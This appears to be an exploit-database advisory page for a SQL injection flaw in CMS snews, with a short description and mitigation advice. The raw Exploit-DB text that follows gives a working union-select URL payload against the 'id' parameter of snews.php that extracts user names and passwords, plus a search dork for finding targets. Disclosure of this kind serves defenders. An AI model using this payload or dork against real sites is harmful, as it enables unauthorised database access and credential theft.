CMS snews SQL Injection Vulnerability

vendor:

CMS snews

by:

onestree

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: CMS snews

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 12.10, Windows 7

2013

CMS snews SQL Injection Vulnerability

A SQL injection vulnerability exists in CMS snews, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'snews.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user-supplied input to prevent malicious SQL code from being passed to the database.

Source

Exploit-DB raw data:

  ____   ____   ____   _______/  |________   ____   ____  
 /  _ \ /    \_/ __ \ /  ___/\   __\_  __ \_/ __ \_/ __ \ 
(  <_> )   |  \  ___/ \___ \  |  |  |  | \/\  ___/\  ___/ 
 \____/|___|  /\___  >____  > |_ |  |__|    \___  >\___  >
            \/     \/     \/                    \/     \/ 
     

# Exploit Title : CMS snews SQL Injection Vulnerability
# Author        : By onestree
# Software Link : http://snewscms.com/
# tested        : ubuntu 12.10 / win 7
# Dork          : inurl:"tanyakan pada rumput yang bergoyang"


*************************************************************

SQL poc:

http://localhost/snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
 

Thanks : 

  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
     
          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*